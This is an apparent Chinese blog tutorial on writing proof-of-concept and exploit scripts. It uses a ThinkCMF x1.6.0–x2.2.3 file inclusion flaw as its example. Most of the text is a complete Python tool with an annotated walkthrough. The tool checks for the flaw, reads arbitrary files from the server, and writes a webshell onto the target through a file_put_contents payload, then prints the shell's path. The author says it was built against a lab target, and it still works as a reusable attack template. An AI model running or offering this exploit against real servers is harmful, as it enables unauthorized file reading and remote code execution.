POC&EXP编写—EXP编写实战(1)

@TOC

1. 前言

通过上一篇文章的了解,应该都了解了POC是怎么编写的,而且POCEXP的区别就是POC只能验证漏洞,简单来说就是通过判断特定的响应值来判断是否存在漏洞,而且EXP就需要将响应的内容给返回回来,但是整体在编写的时候基本上都差不多!关于用的模块或者参数除非是前面没了解过的,否则不再进行赘述,请查看前面的文章!

整体来说,当你编写一个POCEXP后,后续的编写基本上都是套模板,除非遇到一些很复杂的漏洞,可能需要修改很多内容,否则一般的漏洞基本上就是修改模板。

2. thinkcmf 文件包含

这里我还是沿用之前的POC,在POC中添加EXP部分,我个人的理解以及在日常使用中写这些验证脚本,很多情况下普遍都是只写一个EXP或者POC就结束了,相对复杂一点的漏洞很多都是只有POC,由于较为复杂的漏洞EXP编写起来会很麻烦,同时不同的情况下也会导致脚本出现异常。

当然这里如果是大佬编写的脚本或代码水平不错的人写出的脚本,相对来说质量更好,并且编写EXP可能需要多个环境测试,例如我这里编写的脚本都是基于网站上靶机去编写的,自然可能会遇到在实际的情况中不符的情况,那么就需要不断的更改,很多情况下例如POC,是否能够准确的验证出来,取决于返回包的内容是否能够进行判断,至于URL,漏洞的URL都是固定的,这个没什么疑惑。

这里我直接放置这个文件包含的,整体POCEXP,当然你分开也可以,仔细观察这些代码,其实能够看出来,基本上就是一套模板,然后根据返回的响应内容来进行二次判断。

当然我这边的代码其实并不是很周全,比如关于输入的httphttps的校验等等均没有写,这个就属于处理用户输入进来的内容,这部分涉及不到很复杂的内容,自己修改吧!

import argparse
import requests
import sys
import re

import requests


def poc(url, port):
    payload = "/?a=display&templateFile=README.md"
    url1 = f"{url}:{port}{payload}"
    headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0",
               "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
               "Accept-Language": "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3", "Accept-Encoding": "gzip, deflate, br",
               "DNT": "1", "Connection": "close"}
    try:
        r = requests.get(url1, headers=headers, verify=False, timeout=5, allow_redirects=False)
        if r.status_code == 200 and "ThinkCMF是一款" in r.text:
            print(f"[+]{url}存在Thinkcmf文件包含漏洞")
        else:
            print(f"[-]{url}不存在Thinkcmf文件包含漏洞")
    except Exception as e:
        print(f"[-]{url}存在异常,请检查!")
        sys.exit(1)


def exp(url, port, document):
    payload = f"/?a=display&templateFile={document}"
    url1 = f"{url}:{port}{payload}"
    headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0",
               "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
               "Accept-Language": "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3", "Accept-Encoding": "gzip, deflate, br",
               "DNT": "1", "Connection": "close"}
    try:
        r = requests.get(url1, headers=headers, verify=False, timeout=5, allow_redirects=False)
        pattern = r"^(.*?)<div id=\"think_page_trace\" style=\"position: fixed;bottom:0;"
        match = re.search(pattern, r.text, re.DOTALL)
        if r.status_code == 200 and match:
            print(match.group(1).strip())
        else:
            print("没有找到匹配的内容")
    except Exception as e:
        print(f"[-]{url}存在异常,请检查!")
        sys.exit(1)


def exp1(url, port, contain, execute):
    payload = f"/?a=fetch&templateFile=public/index&prefix=%27%27&content=%3Cphp%3Efile_put_contents(%27{contain}%27,{execute})%3C/php%3E"
    url1 = f"{url}:{port}{payload}"
    headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0",
               "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
               "Accept-Language": "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3", "Accept-Encoding": "gzip, deflate, br",
               "DNT": "1", "Connection": "close"}
    try:
        r = requests.get(url1, headers=headers, verify=False, timeout=5, allow_redirects=False)
        if r.status_code == 200:
            print(f"木马访问路径:{url}:{port}/{contain}")
        else:
            print("木马疑似为写入失败!")
    except Exception as e:
        print(f"[-]{url}存在异常,请检查!")
        sys.exit(1)


def main():
    banner = """
d888888P dP       oo          dP        a88888b. 8888ba.88ba   88888888b 
   88    88                   88       d8'   `88 88  `8b  `8b  88        
   88    88d888b. dP 88d888b. 88  .dP  88        88   88   88 a88aaaa    
   88    88'  `88 88 88'  `88 88888"   88        88   88   88  88        
   88    88    88 88 88    88 88  `8b. Y8.   .88 88   88   88  88        
   dP    dP    dP dP dP    dP dP   `YP  Y88888P' dP   dP   dP  dP        
    """
    print(banner)
    print("Vulnerability version: x1.6.0-x2.2.3")
    print("")
    parser = argparse.ArgumentParser()
    parser.add_argument("-u", dest="url", required=True, type=str, default=None, help="Vulnerability IP")
    parser.add_argument("-p", dest="port", required=False, type=int, default=8080,
                        help="The default vulnerability port is 80")
    parser.add_argument("-d", dest="document", required=False, type=str, default=None,
                        help="Include file name")
    parser.add_argument("-c", dest="contain", required=False, default=None,
                        help="Trojan name (if selected, you must select the -e parameter to add the code to execute)")
    parser.add_argument("-e", dest="execute", required=False, default=None,
                        help="Executed command (must take -c argument and URL encoded code)")

    args = parser.parse_args()

    try:
        if args.contain and args.execute:
            exp1(args.url, args.port, args.contain, args.execute)
        elif args.document:
            exp(args.url, args.port, args.document)
        elif args.url:
            poc(args.url, args.port)
        else:
            parser.parse_args(['-h'])
    except KeyboardInterrupt:
        return False


if __name__ == '__main__':
    main()

2.1. 解析第一个EXP()

这里我们解析的一个EXP,关于POC应该没什么好说的,在之前都已经说过了,同时想要看懂代码,我觉得最简单的就是去看一下复现的流程!

这个EXP主要是用于实现文件包含内容。

以下代码均是靶机,可能与现实中存在不符,同时没有进行过多的测试,主要是介绍思路,并非编写EXP

复现参考:thinkcmf 文件包含 x1.6.0-x2.2.3 已亲自复现_thinkcmf 文件包含 x1.6.0-x2.2.3 vulfocus-CSDN博客

执行代码:

def exp(url, port, document):
    ##漏洞url访问链接,document就是用于接收用户输入进来想要进行文件包含的内容。
    payload = f"/?a=display&templateFile={document}"
    ##拼接URL
    url1 = f"{url}:{port}{payload}"
    ##请求头
    headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0",
               "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
               "Accept-Language": "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3", "Accept-Encoding": "gzip, deflate, br",
               "DNT": "1", "Connection": "close"}
    ##异常捕捉
    try:
        ##发送get请求
        r = requests.get(url1, headers=headers, verify=False, timeout=5, allow_redirects=False)
        ##正则匹配看下面的模块介绍
        pattern = r"^(.*?)<div id=\"think_page_trace\" style=\"position: fixed;bottom:0;"
        match = re.search(pattern, r.text, re.DOTALL)
        ##判断响应是否为200,根据burp显示的响应来判断,同时正则匹配到的数据是否存在
        if r.status_code == 200 and match:
            ##返回第一个括号内匹配到的内容,也就是<div id="think_page_trace"之前的所有内容,strip()方法用于去除字符串两端的空白字符(包括换行符和空格)。
            print(match.group(1).strip())
        else:
            print("没有找到匹配的内容")
    except Exception as e:
        print(f"[-]{url}存在异常,请检查!")
        sys.exit(1)

选项代码:

##添加url
parser.add_argument("-u", dest="url", required=True, type=str, default=None, help="Vulnerability IP")
##添加端口
parser.add_argument("-p", dest="port", required=False, type=int, default=8080,
                        help="The default vulnerability port is 80")
##添加用户需要包含的文件名
parser.add_argument("-d", dest="document", required=False, type=str, default=None,
                        help="Include file name")

2.1.1. re模块

参考链接:python——正则表达式(re模块)详解_python re正则-CSDN博客

在Python中,re 模块是用于处理正则表达式的标准库。正则表达式(Regular Expression,简称 regex 或 regexp)是一种强大的文本处理工具,它使用一种特殊的语法来匹配和操作字符串。通过 re 模块,你可以轻松地在Python程序中执行各种复杂的文本搜索和替换操作。

以下是 re 模块中一些常用的函数和方法:

2.1.1.1. 编译正则表达式
re.compile(pattern, flags=0)

这个函数用于将正则表达式字符串编译成一个正则表达式对象,以便后续使用。flags 参数用于设置正则表达式的匹配模式,如 re.IGNORECASE(忽略大小写)或 re.MULTILINE(多行模式)。

2.1.1.2. 匹配操作
  • re.match(pattern, string, flags=0):从字符串的起始位置匹配正则表达式,如果起始位置匹配成功则返回一个匹配对象,否则返回 None
  • re.search(pattern, string, flags=0):扫描整个字符串并返回第一个成功的匹配。如果字符串中没有匹配项,则返回 None
  • re.findall(pattern, string, flags=0):在字符串中找到正则表达式所匹配的所有子串,并返回一个列表,如果没有找到匹配的,则返回空列表。
  • re.finditer(pattern, string, flags=0):和 findall 类似,但返回的是一个迭代器,其中每个元素都是一个匹配对象。
2.1.1.3. 替换操作
re.sub(pattern, repl, string, count=0, flags=0)

这个函数用于在字符串中查找匹配正则表达式的子串,并将其替换为指定的字符串。count 参数用于指定最多替换次数,默认为0,表示替换所有匹配项。

2.1.1.4. 分割操作
re.split(pattern, string, maxsplit=0, flags=0)

这个函数按照能够匹配的子串将字符串分割后返回列表。maxsplit 用于指定最大分割次数,默认为0,表示不限制分割次数。

2.1.1.5. 匹配对象的方法

匹配对象(由 match()search() 返回)有一些方法可以用于获取匹配信息:

  • group(num=0):返回整个匹配对象,或者编号为 num 的子组。
  • groups():返回一个包含所有匹配子组的元组(如果没有子组,则返回空元组)。
  • start([group])end([group]):返回匹配或子组在字符串中的开始和结束位置。
  • span([group]):返回一个包含匹配或子组在字符串中的开始和结束位置的元组。

这只是 re 模块功能的一部分。正则表达式本身是一门深奥的学问,涉及许多复杂的语法和概念。但通过 re 模块,你可以轻松地在Python中利用正则表达式的强大功能来处理文本数据。

2.1.2. 分析代码中re

关于这里不懂的,可以直接将代码发给AI分析,同时如果re模块用的不熟,其实也可以将返回响应值,发给AI,让AI帮忙写re正则,然后自己再去修改。

pattern = r"^(.*?)<div id=\"think_page_trace\" style=\"position: fixed;bottom:0;"
        match = re.search(pattern, r.text, re.DOTALL)
        ##判断响应是否为200,根据burp显示的响应来判断,同时正则匹配到的数据是否存在
        if r.status_code == 200 and match:
            ##返回第一个括号内匹配到的内容,也就是<div id="think_page_trace"之前的所有内容,strip()方法用于去除字符串两端的空白字符(包括换行符和空格)。
            print(match.group(1).strip())

从上述的代码中我们结合下图来进行分析,我们需要获取到的是红框框选起来的内容,如果我们直接将r.text输出的话,那么我们的内容会是很多的,包含下面的div代码都会输出出来。而我们需要的只有红框中的内容,那么就可以使用re,去匹配这些内容。

我这里观察到,不管是执行config.yaml文件还是Nginx.conf文件,代码响应包下面都有div代码,那么我们就可以使用re去查找。

image-20240415134129193

pattern = r"^(.*?)<div id=\"think_page_trace\" style=\"position: fixed;bottom:0;"

而这里的代码意思就是从r中寻找到<div id=\"think_page_trace\" style=\"position: fixed;bottom:0;这行内容,这里的r就是,我们发送完get请求返回的内容,默认输出的时候是执行r.text,而这里我们将r交个re处理,然后这行结尾之前的内容保存到pattern中。

match = re.search(pattern, r.text, re.DOTALL)

然后使用re库的search方法在r.text(请求的响应文本)中搜索与pattern匹配的内容。re.DOTALL标志使得.能够匹配任何字符,包括换行符。

 if r.status_code == 200 and match:
    print(match.group(1).strip())

检查HTTP请求是否成功返回(状态码为200),检查是否找到了与正则表达式匹配的内容,当两个条件满足后,这行代码会打印出匹配到的第一个分组(即正则表达式中的(.*?)部分)的内容,并使用strip()方法去除首尾的空白字符。

2.1.3. 执行效果

这里忽略字符画的CVE编号,主要是我模板写错了,我也没修改了。

image-20240415135957565

2.2. 解析第二个EXP1()

第二个EXP主要是用于实现木马上传作用,整体来说,我觉得EXPPOC没有如何的区别,本质上也就是执行的payload不同,所以再编写上,本质无任何区别。

执行代码:

##这里contain是木马名称,execute是代码命令(需要进行url编码)
def exp1(url, port, contain, execute):
    ##漏洞URL,拼接命令
    payload = f"/?a=fetch&templateFile=public/index&prefix=%27%27&content=%3Cphp%3Efile_put_contents(%27{contain}%27,{execute})%3C/php%3E"
    ##拼接url
    url1 = f"{url}:{port}{payload}"
    ##请求头
    headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0",
               "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
               "Accept-Language": "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3", "Accept-Encoding": "gzip, deflate, br",
               "DNT": "1", "Connection": "close"}
    ##异常捕捉
    try:
        r = requests.get(url1, headers=headers, verify=False, timeout=5, allow_redirects=False)
        ##判断上传成功与否
        if r.status_code == 200:
            ##返回木马路径
            print(f"木马访问路径:{url}:{port}/{contain}")
        else:
            print("木马疑似为写入失败!")
    except Exception as e:
        print(f"[-]{url}存在异常,请检查!")
        sys.exit(1)

选项代码:

这里选项代码,需要注意 -c-e必须一起使用,后面的提示我也写了,如果不一起使用,可能就会执行其他的语句或者直接报错。

##添加url
parser.add_argument("-u", dest="url", required=True, type=str, default=None, help="Vulnerability IP")
##添加端口
parser.add_argument("-p", dest="port", required=False, type=int, default=8080,
                        help="The default vulnerability port is 80")
##添加用户需要包含的文件名
parser.add_argument("-d", dest="document", required=False, type=str, default=None,
                        help="Include file name")
##添加木马名称
parser.add_argument("-c", dest="contain", required=False, default=None,
                        help="Trojan name (if selected, you must select the -e parameter to add the code to execute)")

##添加木马内的代码
parser.add_argument("-e", dest="execute", required=False, default=None,
                        help="Executed command (must take -c argument and URL encoded code)")

这里会发现-c是木马的文件名.后缀,-e是文件中的命令,这里还需要将命令进行URL编码,这里不在代码中进行编码,是由于如果在cmd中直接输入命令会出现无法输入的情况,当然这个是可以解决的:

首先输入的时候加上双引号,在代码中对输入进行的内容进行替换只取双引号直接的内容,如何进行url编码,传参上去执行,当然我不想写就这样吧!感兴趣的自己去修改一下代码,前往别脑子会了,手不会,多练习,不是看一遍后,就觉得编写代码这么简单,结果下次还不会。

image-20240415140916285

2.2.1. 执行后的效果

这里忽略URL地址,由于是开的在线靶场,有时间限制,一边写一边测试,就会过期,如何就得重新开。

image-20240415141524623

2.3. 用户选项执行判断

这里我就简单说一下吧,下面的代码主要是判断用户输入的参数是那些,根据输入的参数来判断执行的是POC还是EXP,或者说能听懂的,就是用户是只想测试一下有没有漏洞,还是想要读取一下文件内容,亦或者想要上传个文件。

    try:
        if args.contain and args.execute:
            exp1(args.url, args.port, args.contain, args.execute)
        elif args.document:
            exp(args.url, args.port, args.document)
        elif args.url:
            poc(args.url, args.port)
        else:
            parser.parse_args(['-h'])
    except KeyboardInterrupt:
        return False

而自上而下的内容指定好,例如,如果你将判断用户 elif args.url:放在第一行,那么肯定有问题的,因为我们url是强制性必须输入,那么你后续不管输入多少个参数,都会执行第一行,因为匹配到url了。

所以你看我匹配的第一行是用户有没有输入文件名同时输入命令代码,如果输入了那么和执行文件上传的代码,如果输入了文件名,那么就执行文件包含的代码,如果只输入的URLport,那么就进行一个普通的poc验证。

  • 3
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

剁椒鱼头没剁椒

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值